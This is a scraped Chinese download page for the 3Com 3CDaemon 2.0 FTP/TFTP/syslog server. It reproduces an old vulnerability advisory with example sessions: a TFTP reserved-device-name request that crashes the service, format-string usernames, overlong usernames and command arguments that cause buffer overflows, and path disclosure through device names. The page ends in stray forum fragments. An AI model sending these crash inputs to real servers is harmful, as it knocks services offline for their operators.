|
|
3com 3cdaemon是一款多重服务器功能集成软件,主要作用于服务器中,同时还能够帮助用户改善相关的电脑功能,需要的用户快来绿色资源网下载吧!
3com 3cdaemon软件简介:
3com的这款东西还是很有名很不错滴~~~3cdaemon是一款免费的集成了tftp、ftp和syslog功能的应用程序;作用于ftp,tftp,syslog服务器,tftp客户端,虽然还存在很多的问题,但是使用起来还是不错的!
3com 3cdaemon问题详解:
1、tftp保留设备名拒绝服务攻击
提交类似如下的请求,可导致tftp服务程序挂起:
d:windowssystem32>tftp -i 192.168.0.1 get prn
the 3cdaemon will be crashed with some msgs like
"microsoft visual c++ runtime library"
"runtime error!"
"program : c:program files3com3cdaemon3cdaemon.exe "
"abnormal program termination".
2、ftp用户名存在格式串问题
提交包含格式串字符作为用户名数据,可导致守护程序崩溃:
h:>ftp 192.168.0.1
connected to 192.168.0.1.
220 3com 3cdaemon ftp server version 2.0
user (192.168.0.1 none)): %n
connection closed by remote host.
or:
h:>ftp 192.168.0.1
connected to 192.168.0.1.
220 3com 3cdaemon ftp server version 2.0
user (192.168.0.1none)): %s
331 user name ok, need password
password:[anythinghere]
530 loginaccessdenied
login failed.
ftp>
3、ftp超长用户名缓冲区溢出
由于对用户名缺少正确边界缓冲区检查,提交超长用户名可导致缓冲区溢出:
d:windowssystem32>ftp 192.168.0.1
connected to 192.168.0.1.
220 3com 3cdaemon ftp server version 2.0
user (192.168.0.1none)):
501 invalid or missing parameters
login failed.
ftp> user aaa..[about 241 a here]...aaaaa
connection closed by remote host.
4、多个ftp命令超长参数缓冲区溢出
cd,send,ls,,put,delete,rename,rmdir,literal,stat,cwd等ftp命令对参数缺少充分边界检查,提交超长字符串作为命令参数可导致缓冲区溢出:
ftp> cd aaa..[about 398 a here]...aaaaa
connection closed by remote host.
ftp>
ftp> ls aaa..[about 247 a here]...aaaaa
200 port command successful.
connection closed by remote host.
ftp> put 1.txt aaa..[about 247 a here]...aaaaa
200 port command successful.
532 need account for storing files
connection closed by remote host.
5、多个ftp命令存在格式串问题
提交格式字符串作为参数,可导致程序崩溃。
6、多个ftp命令包设备名信息泄露问题
请求保留设备名可导致返回程序安装路径信息:
ftp> cd aux
550 aux : c:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : c:/3cdaemon/lpt1 is not a directory!
受影响系统:
3com 3cdaemon 2.0 revision 10
n class="count">(1/1)安装详细截图
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
发表于 2024-12-6 02:19:06